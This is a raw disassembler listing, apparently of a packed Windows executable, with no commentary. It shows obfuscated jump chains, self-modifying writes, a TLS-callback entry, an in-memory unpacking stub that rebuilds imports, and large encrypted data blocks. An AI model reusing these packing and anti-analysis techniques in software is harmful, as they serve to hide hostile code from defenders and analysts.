		xchg	eax, ecx
; END OF FUNCTION CHUNK	FOR sub_488F35
; ---------------------------------------------------------------------------
		db 0C5h
		dd 0FFE081E9h, 4589FFh,	0FFAC29E9h
		db 0FFh, 2 dup(0)
; ---------------------------------------------------------------------------

locret_48DCE7:				; CODE XREF: _3gijy9nr:0048DA01j
		retn
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48DCEA:				; CODE XREF: _3gijy9nr:0048ABBEj
		jmp	locret_48BADB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_489593

loc_48DCEF:				; CODE XREF: sub_489593+7j
		call	loc_48902D
; END OF FUNCTION CHUNK	FOR sub_489593
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48DCF6:				; CODE XREF: _3gijy9nr:0048D1ACj
		jmp	loc_48C9B5
; ---------------------------------------------------------------------------
		align 4
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48DCFD:				; CODE XREF: sub_48B609+439j
		jmp	near ptr dword_48A9A4+7
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		align 4

loc_48DD04:				; CODE XREF: _3gijy9nr:0048949Cj
		mov	byte ptr [ebx],	33h
		pop	ebx
		mov	dword ptr [ebp-18h], 74726956h
		mov	dword ptr [ebp-14h], 516C6175h
		mov	dword ptr [ebp-10h], 79726575h

loc_48DD1D:				; DATA XREF: _3gijy9nr:00489497o
		xor	eax, eax
		call	sub_48D530
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48DD26:				; CODE XREF: _3gijy9nr:0048B493j
		jmp	near ptr dword_48A904+2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_553. PRESS KEYPAD	"+" TO EXPAND]
		db 0
; ---------------------------------------------------------------------------

loc_48DD2D:				; CODE XREF: _3gijy9nr:0048DDF1j
		jmp	loc_48D834
; ---------------------------------------------------------------------------
		align 4

loc_48DD34:				; CODE XREF: _3gijy9nr:0048DA41j
		jmp	locret_48D23A
; ---------------------------------------------------------------------------

loc_48DD39:				; CODE XREF: _3gijy9nr:0048CD90j
		mov	byte ptr [ecx],	87h
		pop	ecx
		push	edi
		push	offset byte_48C6DF
		jmp	loc_48C850

; =============== S U B	R O U T	I N E =======================================



sub_48DD48	proc near		; CODE XREF: _3gijy9nr:0048C575j
					; sub_48D704-7BCp
		xchg	ebx, [esp+0]
		pop	ebx
		xor	ebx, 91A1413h

loc_48DD52:				; DATA XREF: _3gijy9nr:0048C189o
		pop	ebp
		retn
sub_48DD48	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		dd 0FFCBCFE8h
		db 0FFh, 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48AB22

loc_48DD5B:				; CODE XREF: sub_48AB22+8j
		jmp	near ptr dword_48893C+7Fh
; END OF FUNCTION CHUNK	FOR sub_48AB22
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_488E43

loc_48DD61:				; CODE XREF: sub_488E43-32Cj
		jmp	nullsub_548
; END OF FUNCTION CHUNK	FOR sub_488E43
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_569. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		mov	eax, [eax]
		popf
		mov	al, [eax]
		push	48BF55h
		jmp	locret_48B706
; ---------------------------------------------------------------------------
		push	esi
		mov	esi, edi
		xchg	esi, [esp]
		push	eax
		pop	edi
		xchg	edi, [esp]

loc_48DD81:				; CODE XREF: _3gijy9nr:004897C6j
		push	eax
		jmp	loc_48CCBF
; ---------------------------------------------------------------------------
		align 4
		push	edx
		jmp	loc_48AD2C
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_488830

loc_48DD8F:				; CODE XREF: sub_488830:loc_4897E0j
		mov	eax, ebp
		or	ebp, edx
		jmp	loc_489DFB
; END OF FUNCTION CHUNK	FOR sub_488830
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48DD98:				; CODE XREF: sub_48B609:loc_48BECBj
		push	291C03Ah
		xchg	ebp, [esp+0]
		mov	esi, ebp
		pop	ebp
		or	esi, 48AD9A0Eh
		jmp	near ptr dword_48BA90+1Fh
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		dw 8B57h
		dd 243C87F9h, 0A7F0058Dh, 0B1E80048h, 0FFFFC9h
		db 0
; ---------------------------------------------------------------------------

loc_48DDC1:				; CODE XREF: _3gijy9nr:0048A66Bj
		xchg	edx, [esp]
		pop	edx
		pushf
		push	9C325AA3h
		xchg	ecx, [esp]
		mov	esi, ecx
		pop	ecx
		xor	esi, 0AC16FA3Dh
		jmp	loc_48D3EF
; ---------------------------------------------------------------------------

loc_48DDDC:				; CODE XREF: _3gijy9nr:0048AF36j
		sub	ebx, 8AE5CC82h
		xchg	esi, [esp]
		pop	esi
		push	5EAC0D45h
		push	ebx
		mov	ebx, offset loc_48B13B
		jmp	loc_48DD2D
; ---------------------------------------------------------------------------
		dw 3487h
		dd 689C5E24h, 0E3558FDh, 0D2CA815Ah, 812DB4BFh,	5335F9F2h
		dd 17C2C17Dh, 0FFD308E9h
		db 0FFh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48ABA0

loc_48DE15:				; CODE XREF: sub_48ABA0+Fj
					; DATA XREF: sub_48B609-1CC3o
		cmc
		shr	dword ptr [eax-76h], 0ABh
		dec	eax
		add	cl, ch
		test	[edi+128BFFFFh], dh

loc_48DE23:				; DATA XREF: _3gijy9nr:loc_48CD30o
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jnz	near ptr dword_4888A0+45h
		jmp	near ptr dword_4888A0+40h
; END OF FUNCTION CHUNK	FOR sub_48ABA0
; ---------------------------------------------------------------------------
		align 4
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48DE35:				; CODE XREF: sub_48B609-1FD4j
		jmp	loc_48C901
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_489B60

loc_48DE3A:				; CODE XREF: sub_489B60-5F2j
		jmp	loc_48B104
; END OF FUNCTION CHUNK	FOR sub_489B60
; ---------------------------------------------------------------------------
		align 10h
		dd 0CEE6E800h, 0FFFFh, 8113E9C1h, 2346C6E6h, 0C943E9B6h
		dd 9C00FFFFh, 0FFC8EDE9h
; ---------------------------------------------------------------------------
		inc	dword ptr [eax]

loc_48DE5E:				; CODE XREF: _3gijy9nr:0048CB7Fj
		and	ecx, 0FE00AD6Eh
		or	ecx, 0BE85A4E0h
		push	esi
		mov	esi, 489985h
		jmp	near ptr dword_489974+7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48DE75:				; CODE XREF: sub_48B609+B90j
		jnz	loc_48A47F
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		db 0
		db 0
; ---------------------------------------------------------------------------

loc_48DE7D:				; CODE XREF: _3gijy9nr:0048D9A6j
		jmp	loc_488B12
; ---------------------------------------------------------------------------
		dw 0EE3Bh
		dd 0FFC5EAE9h
; ---------------------------------------------------------------------------
		inc	ebx
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_566. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_48DE8B:				; CODE XREF: _3gijy9nr:0048CA58j
		jmp	near ptr dword_488C00+11h
; ---------------------------------------------------------------------------
		db 2 dup(0)
word_48DE92	dw 0C381h		; DATA XREF: sub_48B609+266Co
		dd 8D49AEADh, 0FFE6A2E8h, 810000FFh, 670C5CDAh,	9D43685Ah
		dd 92E90048h, 0FFFFBEh,	0E9D31B00h, 0FFFFF4C2h,	24148700h
		dd 875FF5Ah, 0FFAFCAE8h
		db 0FFh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48DEC5:				; CODE XREF: sub_48B609:loc_48BCAFj
		xor	esi, 0EFBF9378h
		sub	esi, 0C1D2B8A5h
		push	edi
		push	42A6A851h
		pop	edi
		jmp	loc_48C7E7
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		db 2 dup(0), 9Ch
		dd 0FFF008E9h, 520000FFh, 0F0228168h, 0C2815A5Eh, 0AD560A74h
		dd 0CF79CA81h, 0EA81F0EEh, 0D7D507C0h, 0FFEBE7E9h, 348700FFh
		dd 0EECF6824h, 0C15EE02Eh, 0E6E817C6h, 0FFFFA9h, 74FE8100h
		dd 0E9D44A80h, 0FFFFBACBh
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48DF26:				; DATA XREF: sub_48D530-227Co
		add	ecx, 0FCA0D5F5h
		xchg	ecx, [esp]
		jmp	loc_48DF36
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

loc_48DF35:				; DATA XREF: sub_48B609-146Eo
		xchg	eax, ecx

loc_48DF36:				; CODE XREF: _3gijy9nr:0048DF2Fj
		push	esi
		push	90A31227h
		pop	esi
		sub	esi, 0C77DF548h
		js	near ptr loc_48B4D4+1

loc_48DF49:				; CODE XREF: _3gijy9nr:0048D5E8j
		jmp	loc_48AEAF
; ---------------------------------------------------------------------------

loc_48DF4E:				; CODE XREF: _3gijy9nr:0048C08Aj
		jmp	loc_48B78D
; ---------------------------------------------------------------------------
		align 4
		db 0
byte_48DF55	db 59h,	57h		; DATA XREF: _3gijy9nr:loc_48A27Fo
byte_48DF57	db 47h			; DATA XREF: sub_48AC2D+5o
		dd 48BD8568h, 0E153E900h, 0C3FFFFh, 0B6F9E900h
		db 2 dup(0FFh),	0

; =============== S U B	R O U T	I N E =======================================



sub_48DF6B	proc near		; CODE XREF: _3gijy9nr:0048A430p

; FUNCTION CHUNK AT 0048940C SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0048AB9B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048CFA1 SIZE 0000000A BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		push	eax
		mov	eax, edx
		jmp	loc_48940C
sub_48DF6B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		db 68h
		dd offset dword_488BC4+23h
		dd 0FFAC63E9h, 0C2C100FFh, 0B3B9E902h, 0FFFFh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48DF8C:				; CODE XREF: sub_48B609+9CCj
		sbb	ebp, 3D58025Fh
		or	ebp, 45855B29h
		cmp	ebx, 2C5C618h
		jmp	loc_48D24E
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		align 4
		db 0

; =============== S U B	R O U T	I N E =======================================



sub_48DFA5	proc near		; CODE XREF: _3gijy9nr:0048CD99j
		xchg	ebx, [esp+0]
		pop	ebx
		mov	byte ptr [ebx],	0Fh
		pop	ebx
		rol	edx, 3
		xor	edx, eax
		jmp	near ptr dword_48B2EC+47h
sub_48DFA5	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4896F0

loc_48DFB7:				; CODE XREF: sub_4896F0:loc_4897FFj
		jz	loc_48CF17
		jmp	loc_48AC1F
; END OF FUNCTION CHUNK	FOR sub_4896F0

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_48DFC2	proc near		; CODE XREF: _3gijy9nr:loc_48CA12p

var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0048E117 SIZE 0000000B BYTES

		push	ebp
		mov	ebp, esp
		add	esp, 0FFFFFFF4h
		push	esi
		push	edi
		push	ebx

loc_48DFCB:				; CODE XREF: sub_48B609:loc_48D24Ej
		mov	esi, offset dword_43B000
		mov	eax, 400000h
		mov	[ebp+var_4], eax
		mov	edx, eax

loc_48DFDA:				; CODE XREF: sub_48DFC2+15Bj
		mov	eax, [esi+0Ch]
		or	eax, eax
		jz	loc_48E071
		add	eax, edx
		mov	ebx, eax
		push	eax
		call	ds:dword_45D0B4	; GetModuleHandleA
		or	eax, eax
		jnz	loc_48E007
		push	ebx
		call	ds:dword_45D0B8	; LoadLibraryA
		or	eax, eax
		jz	loc_48E069

loc_48E007:				; CODE XREF: sub_48DFC2+30j
		mov	[ebp+var_8], eax
		push	0
		pop	[ebp+var_C]

loc_48E00F:				; CODE XREF: sub_48DFC2+A2j
		mov	eax, [esi]
		or	eax, eax
		mov	edx, [ebp+var_4]
		jnz	loc_48E01F
		mov	eax, [esi+10h]

loc_48E01F:				; CODE XREF: sub_48DFC2+54j
		add	eax, edx
		add	eax, [ebp+var_C]
		mov	ebx, [eax]
		mov	edi, [esi+10h]
		add	edi, edx
		add	edi, [ebp+var_C]
		or	ebx, ebx
		jz	loc_48E117
		test	ebx, 80000000h
		jnz	loc_48E046
		lea	ebx, [ebx+edx+2]

loc_48E046:				; CODE XREF: sub_48DFC2+7Aj
		and	ebx, 7FFFFFFFh
		push	ebx
		push	[ebp+var_8]
		call	ds:dword_45D0BC	; GetProcAddress
		or	eax, eax
		jz	loc_48E069
		mov	[edi], eax
		add	[ebp+var_C], 4
		jmp	loc_48E00F
; ---------------------------------------------------------------------------

loc_48E069:				; CODE XREF: sub_48DFC2+3Fj
					; sub_48DFC2+96j
		push	ebx
		mov	eax, ebx
		call	sub_48E078

loc_48E071:				; CODE XREF: sub_48DFC2+1Dj
		pop	ebx
		pop	edi
		pop	esi
		mov	esp, ebp
		pop	ebp
		retn
sub_48DFC2	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_48E078	proc near		; CODE XREF: sub_48DFC2+AAp

var_108		= dword	ptr -108h
var_104		= dword	ptr -104h
var_100		= dword	ptr -100h
var_FC		= dword	ptr -0FCh
var_F8		= dword	ptr -0F8h

		push	ebp
		mov	ebp, esp
		add	esp, 0FFFFFEF8h
		mov	[ebp+var_104], eax
		mov	[ebp+var_100], 276E6143h
		mov	[ebp+var_FC], 6F6C2074h
		mov	[ebp+var_F8], 206461h
		mov	[ebp+var_108], 0Bh

loc_48E0AF:				; CODE XREF: sub_48E078+98j
		mov	eax, [ebp+var_104]
		cmp	byte ptr [eax],	0
		jnz	loc_48E0EF
		mov	eax, [ebp+var_108]
		mov	byte ptr [ebp+eax+var_100], 0
		push	2010h
		push	0
		lea	eax, [ebp+var_100]
		push	eax
		push	0
		call	ds:dword_45D104	; MessageBoxA
		push	0FFFFFFFFh
		call	ds:dword_45D0C0	; ExitProcess
		mov	esp, ebp
		pop	ebp
		retn
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

loc_48E0EF:				; CODE XREF: sub_48E078+40j
		mov	eax, [ebp+var_108]
		mov	edx, [ebp+var_104]
		mov	dl, [edx]
		mov	byte ptr [ebp+eax+var_100], dl
		inc	[ebp+var_108]
		inc	[ebp+var_104]
		jmp	loc_48E0AF
sub_48E078	endp

; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DFC2

loc_48E117:				; CODE XREF: sub_48DFC2+6Ej
		add	esi, 14h
		mov	edx, [ebp+var_4]
		jmp	loc_48DFDA
; END OF FUNCTION CHUNK	FOR sub_48DFC2

; =============== S U B	R O U T	I N E =======================================



sub_48E122	proc near		; CODE XREF: _3gijy9nr:0048B4C6p
					; startp ...
		mov	eax, offset word_488796

locret_48E127:				; DATA XREF: sub_48E128+8o
		retn
sub_48E122	endp


; =============== S U B	R O U T	I N E =======================================



sub_48E128	proc near		; DATA XREF: _3gijy9nr:0048C0F4o

var_14		= dword	ptr -14h
var_10		= dword	ptr -10h

		push	esi
		push	edi
		push	ecx
		push	ebx
		push	eax
		mov	ebx, [esp+14h+var_14]
		sub	ebx, offset locret_48E127
		mov	eax, 46A6h
		push	eax
		push	4
		push	1000h
		push	eax
		push	0
		mov	eax, offset dword_45D0C4
		mov	eax, [eax+ebx]
		call	eax
		pop	ecx
		mov	edx, offset word_488796
		add	edx, ebx
		push	edx
		push	ebx
		push	eax
		mov	edi, eax
		mov	esi, edx
		cld
		rep movsb
		mov	ecx, offset sub_488612
		add	ecx, ebx
		call	ecx
		pop	eax
		mov	ebx, [esp+10h+var_10]
		push	8000h
		push	0
		push	eax
		mov	eax, 45D0C8h
		mov	eax, [eax+ebx]
		call	eax
		pop	ecx
		pop	eax
		pop	ebx
		sub	ebx, 5
		mov	byte ptr [ebx],	0B8h
		inc	ebx
		mov	[ebx], eax
		add	ebx, 4
		mov	byte ptr [ebx],	0C3h
		or	ecx, ecx
		jz	short loc_48E1DD
		mov	ebx, eax
		call	loc_48E23E
		cld
		lodsd
		cmp	eax, 0FFFFFFFFh
		jz	short loc_48E1DD
		push	ebx
		mov	ebx, ecx

loc_48E1A8:				; CODE XREF: sub_48E128+91j
					; sub_48E128+A4j ...
		add	ebx, eax
		add	[ebx], ecx
		add	ebx, 4
		lodsb
		cmp	al, 0FEh
		jnb	short loc_48E1BB
		and	eax, 0FFh
		jmp	short loc_48E1A8
; ---------------------------------------------------------------------------

loc_48E1BB:				; CODE XREF: sub_48E128+8Aj
		add	ebx, 0FEh
		or	eax, eax
		jp	short loc_48E1CE
		lodsw
		and	eax, 0FFFFh
		jmp	short loc_48E1A8
; ---------------------------------------------------------------------------

loc_48E1CE:				; CODE XREF: sub_48E128+9Bj
		lodsd
		dec	esi
		and	eax, 0FFFFFFh
		cmp	eax, 0FFFFFFh
		jnz	short loc_48E1A8
		pop	eax

loc_48E1DD:				; CODE XREF: sub_48E128+6Dj
					; sub_48E128+7Bj
		pop	ebx
		pop	ecx
		pop	edi
		pop	esi
		retn
sub_48E128	endp

; ---------------------------------------------------------------------------
		dw 0A661h
		dd 0A6503571h, 0DF8E4600h, 53A8F7D6h, 576C7F06h, 0DDAE1EBDh
		dd 151AEE3Bh, 43CD50B8h, 9566AFA9h, 0D4831C50h,	5BB9BD16h
		dd 0FCC438Ah, 0A3177871h, 0B3C1E82Ah, 17AFEDFCh, 44491DBh
		dd 3AAA54BCh
		db 7Dh,	0A7h

; =============== S U B	R O U T	I N E =======================================


		public start

start		proc near
		call	sub_48E122
		add	eax, 15DAh
		jmp	eax
start		endp


; =============== S U B	R O U T	I N E =======================================


		public TlsCallback_0

TlsCallback_0	proc near		; DATA XREF: _3gijy9nr:TlsCallbackso
		call	sub_48E122
		add	eax, 205Ah
		jmp	eax
TlsCallback_0	endp

; ---------------------------------------------------------------------------

loc_48E23E:				; CODE XREF: sub_48E128+71p
		call	sub_48E247
; ---------------------------------------------------------------------------
		db 0FFh
		db 3 dup(0FFh)

; =============== S U B	R O U T	I N E =======================================



sub_48E247	proc near		; CODE XREF: _3gijy9nr:loc_48E23Ep
		pop	esi
		retn
sub_48E247	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		align 2
		dw 0B031h
		dd 9D2C0B71h, 4D85B718h, 72537C5Dh, 1D000436h, 4FBF90FAh
		dd 8565E7B4h, 0A6E1535Ch, 0F06CD8AFh, 3D0482F0h, 0BBC57806h
		dd 0EA0AB066h, 0CBD7CA6Dh, 0AD80C8BAh, 0AB577B6Bh, 0AAB5C132h
		dd 8FE5E068h, 14138510h, 685A2210h, 8E25ABBh, 4393ABAEh
		dd 0A609CD97h, 0F6A6AB06h, 5BDB5824h, 20FA7D1Ch, 7FAA276h
		dd 90A7E3D6h, 309E1098h, 80BC9239h, 0BDAACE54h,	4C68FD00h
		dd 0FD4762F4h, 0D825140h, 9F359D80h, 0C76CFE68h, 2901F79h
		dd 0D357DB58h, 0A685B9E3h, 0E4D437D2h, 0DD112A7Ah, 0A5061DD5h
		dd 4866908Fh, 8628DD6Eh, 6A28E9A9h, 0BF448583h,	0DF664B88h
		dd 439DD58Ah, 0B859B1AEh, 0FA50740Eh, 0CB33C91Ch, 0BA1F6E3h
		dd 0D54F2133h, 4CFD3195h, 0DE13B557h, 7E72AA8Ah, 6381DB32h
		dd 6498B444h, 7C2D56CFh, 0D2E1DA1Ah, 0A40E4F20h, 0DC8F8ADCh
		dd 0E4C27DEEh, 4E957CDFh, 0A95D368Ah, 0B55A13B5h, 9E79EC6h
		dd 71C19895h, 0CB7F749Fh, 0BB9B9238h, 51CC55ACh, 181B385Dh
		dd 338147Ah, 0EC001C78h, 0C7D744D6h, 30CB0C83h,	2D360157h
		dd 6E5BB1EDh, 650F56C2h, 14B6EAFEh, 965CED0h, 0C0840866h
		dd 0D918DB29h, 0E95DDB9Bh, 1E768AFFh, 0F3674D37h, 0B3A6E76Eh
		dd 0F74846C9h, 0D2388F6Ch, 8974F278h, 0C47B00BBh, 4AC5B0B2h
		dd 0EAB09D0Fh, 57EA946Bh, 9A85ABD0h, 0CE9E050Bh, 88AC0FB6h
		dd 0D49BF0C5h, 7F478632h, 0C4004434h, 5497B0DEh, 0CE777F6Dh
		dd 0F4E28901h, 9B294915h, 63E91D25h, 428D5B00h,	0FFB01CC7h
		dd 1013C24Ah, 0D445C77h, 29370571h, 0BA8E8A3Eh,	300h dup(0)
_3gijy9nr	ends

; Section 8. (virtual address 0008F000)
; Virtual size			: 00001000 (   4096.)
; Section size in file		: 00001000 (   4096.)
; Offset to raw	data for section: 0008F000
; Flags	40000080: Bss Readable
; Alignment	: default
; ===========================================================================

; Segment type:	Uninitialized
; Segment permissions: Read
_1t0hzn25	segment	para public 'BSS' use32
		assume cs:_1t0hzn25
		;org 48F000h
		assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
		dd 0A37BEED0h, 7FF9DA95h, 7E0ADACCh, 0E1D4D823h, 0E27CC4E5h
		dd 0F20AD707h, 64CBBBC1h, 30245D67h, 76275298h,	49D3C85h
		dd 0C7CCCC2Ch, 0CF7DB9BFh, 1FF3EB97h, 0ACD13FC0h, 0C1F9BAF8h
		dd 1CF9FA7Ch, 0B70B7EBh, 0BEFEB29Eh, 8E7FFBC0h,	1F688189h
		dd 878508CCh, 0DEF7F96Dh, 17B12F34h, 0AF362601h, 0FD16FD1Fh
		dd 0B00118Bh, 24922FF3h, 4ACE51F0h, 0A10B4F74h,	0B4BF9ED2h
		dd 0E8635C53h, 112B4CD5h, 6CE2456h, 0C57F7318h,	3A740245h
		dd 0A15FF64Ah, 0AA20DE58h, 0A58360AEh, 11E72032h, 0E9D26FF9h
		dd 9B8E6592h, 2188C203h, 0CBD5FADDh, 0B3772167h, 49C1E367h
		dd 0B22B2D5h, 9D9DE735h, 92218F76h, 3225873Ch, 5DF5EC51h
		dd 1F5A9FAEh, 0E61E07ADh, 24728DEFh, 0E517310Fh, 2CEE1EF5h
		dd 0D5EEE7FEh, 4759F6D3h, 145C00DDh, 775D0740h,	84CC7B33h
		dd 5E945522h, 5ADF7D86h, 31CA2FF4h, 0A2BC643Ch,	0AABC31Fh
		dd 0F0902B10h, 995987D8h, 3B9349B4h, 2230C6D8h,	593AE15Ah
		dd 6513A4D5h, 0B1388090h, 0C149A9E4h, 8E3D0A83h, 2E9E15BFh
		dd 6B1B3A00h, 0CC7099E1h, 5DD2998Bh, 0F93CC58Eh, 849C3C58h
		dd 1394295Bh, 30B4B69Ah, 9ED553A9h, 9FEB0AAh, 438DC851h
		dd 8B1BA329h, 38F945FAh, 1BBA6381h, 0C5581E29h,	0F07D1D70h
		dd 0A0EE5F8Dh, 3AFEC9DBh, 9CCD26EAh, 0D1463274h, 0A27B18CCh
		dd 6E11DEB8h, 2CF02DA1h, 1D78B94Ch, 790A70DCh, 764A7258h
		dd 33E4D401h, 46DD2F06h, 8986A1B2h, 0DB58F89Bh,	0C71909FBh
		dd 0CEC8C488h, 99A9AAF2h, 278E9636h, 8CC5625Fh,	481F6218h
		dd 7C7B00C7h, 0E3F71B3Fh, 922E554Eh, 3563929Fh,	41C304BCh
		dd 0AD578573h, 0FBFFE72Fh, 81560893h, 0CD4DA860h, 0ECCF3991h
		dd 1EF21410h, 0CAF5D46Eh, 0F6061C5Bh, 0B384B81Ch, 0F1A8AEBAh
		dd 8CEAF29Fh, 0DC86F03h, 776A4FCCh, 60F5B284h, 0B2B6A03Bh
		dd 73B08C47h, 2F06573h,	9DA2DE99h, 577282Eh, 34884978h
		dd 587F176Eh, 0D1E585ECh, 20B18E42h, 59771724h,	47868520h
		dd 8C600616h, 25418DA6h, 0DE81DDEFh, 9CCE98CBh,	0D7B30099h
		dd 36EC6FCFh, 0E4087A98h, 914A6521h, 2D36CA48h,	0F82F4E17h
		dd 311B6753h, 8B17B81Bh, 84FE21F3h, 0AD311072h,	0BFB3C845h
		dd 7DF9BC25h, 0A14DA52Bh, 0A548548h, 0F4391A68h, 13D34E75h
		dd 0CDEF5C39h, 0FF6F4664h, 6A09813Bh, 288A3C02h, 702409A6h
		dd 648E8A2Dh, 18C8561Bh, 779F942Ah, 8F63DA68h, 2CF8DEBh
		dd 511C3BCAh, 21ED1885h, 0DAC40907h, 0E6899C95h, 570DD66Ch
		dd 28F5ECC3h, 523D5BF5h, 62443082h, 8B285E87h, 0B9D6DB12h
		dd 8622EDBAh, 4E5E1218h, 76CCCCBBh, 1DE78A6h, 67587A69h
		dd 0BA318EB3h, 2C19F980h, 0EEC1C757h, 61F8A52Ah, 33DA8A6Dh
		dd 7C2A4334h, 4E09DFAAh, 0F94AAD5Eh, 0C2B2C837h, 5DDC7D56h
		dd 57D5F1D5h, 75FD123Ch, 8EF8C0F5h, 81EF53BFh, 0D4D28400h
		dd 0BF4F2662h, 788DA627h, 86AD0B73h, 1C2EB644h,	5FF2E455h
		dd 746F1F94h, 0DC4679A1h, 299A6F66h, 99FD60DBh,	0CD1E82D4h
		dd 5B6B2220h, 4AAB2702h, 0EB4CC5A2h, 252FAE7h, 4B200B92h
		dd 0DADD2E1Ch, 1D3ADDC4h, 167CD635h, 4EF6D83Ah,	2AA973ABh
		dd 197227BBh, 0E11D1505h, 1E583F93h, 60F789F1h,	4FF89BD8h
		dd 0D8F3295Fh, 8CF8435Bh, 0A2DE15AEh, 0A53DDF75h, 69989B51h
		dd 0B1411C85h, 5E7703F6h, 0D990655Fh, 8BD4849Dh, 58BB5C05h
		dd 90203600h, 0A4A592D0h, 48C1FB97h, 49F38555h,	88231AB0h
		dd 0C9B56556h, 0DF3EB755h, 6F9C3CDh, 436C0927h,	482D0186h
		dd 9E5296Fh, 0F9E33897h, 68654583h, 12D66CD8h, 61BB6E31h
		dd 0D505FE5h, 9E687EE4h, 642A4A03h, 3564D1E7h, 15CEEC5Fh
		dd 8B55CD33h, 0E469CE9h, 0F09A5FBh, 0E3C66750h,	0C97C4FBDh
		dd 1C5BCD95h, 0D6BB0BA2h, 0DFE7662Ah, 7F39A5D5h, 590FD25h
		dd 58417FD9h, 0FD6A556Ch, 25114699h, 71E7F0D6h,	36D12187h
		dd 30E040D1h, 0E3090225h, 7AC05FAEh, 0D815FF61h, 7AB06823h
		dd 14CA6E93h, 29A241BDh, 0D1BE0531h, 0A2AE25CDh, 2286907Eh
		dd 393DDB2Ch, 0F1E55AB0h, 8B793387h, 28DEBB36h,	0C272C64Fh
		dd 3AA60036h, 47B1E316h, 277E31CFh, 939FB158h, 1B125F81h
		dd 0E7E901D1h, 0D5187ABBh, 0D7EE7062h, 0DB4BD529h, 8D3C3F9Fh
		dd 2D37EC53h, 0F82A579Ch, 1EBDB02Fh, 0D621D43Dh, 2D4B1582h
		dd 0E8CF2B89h, 645589F7h, 2CD320D9h, 7DAF8825h,	0ADA36C7Bh
		dd 406689DFh, 9B6657C3h, 5BB7F4C3h, 0EA3AD93Dh,	0A1A32AE3h
		dd 38EAFE3Dh, 0E43373h,	0F9AA73D8h, 1025534Bh, 0B3491E30h
		dd 0D068F8B7h, 0E61E3860h, 4623EAC0h, 25A6E75Dh, 0FC72F7D4h
		dd 311D80Ah, 70AE28F1h,	0D7C308E0h, 0AE93082Ch,	0C3F66091h
		dd 9C6D4D1Ah, 0DA915E1Dh, 92D84750h, 0A22C8729h, 0BD31E402h
		dd 7D0359D4h, 48D9135h,	615F2CCDh, 9FB02E8Dh, 65C87634h
		dd 3D88CB02h, 617F7880h, 3F8AC2A2h, 8DFA074Ah, 5E90B2CBh
		dd 2EA792C2h, 0BE499325h, 0A272C0Eh, 0CC5C4837h, 0B50EBD67h
		dd 7160FFDDh, 0FB2FA729h, 36FE0A53h, 281CA158h,	0CC4912F2h
		dd 74F1EE44h, 605B0F95h, 9052366Ah, 33B3E721h, 9BE5E6EEh
		dd 0E081CEAAh, 0E7CAA768h, 4AE2F6Ah, 6F7A5AC3h,	0ED3DAF40h
		dd 6EDFF66Eh, 2F56F5E0h, 0FFC9B5DFh, 33D4CB00h,	0CACFCAD2h
		dd 93EA11B9h, 0E503E247h, 87030EA5h, 18E50046h,	1EA54FA4h
		dd 6012A429h, 0A94A0E86h, 8FB9942Bh, 0FE69BE32h, 172A9E7Fh
		dd 25C871A0h, 3D6D2061h, 0DF164362h, 1F2A92B5h,	0A6034A46h
		dd 976F21A2h, 0AD716DCh, 1B69DDBh, 0A0D44591h, 9C31B686h
		dd 4F0DC1B2h, 0A4EFFE3h, 790A636Bh, 0A9A836h, 6E92FD95h
		dd 0E776341h, 37921EEAh, 0A207B2A0h, 0CF11C107h, 91B73859h
		dd 0A450364Ah, 33ADD00Eh, 495E7AF6h, 1B68F2BAh,	0ECACDA0h
		dd 0FEB7DBC4h, 79B8CDCDh, 2FD8C919h, 86C6B2F1h,	32D35C4Dh
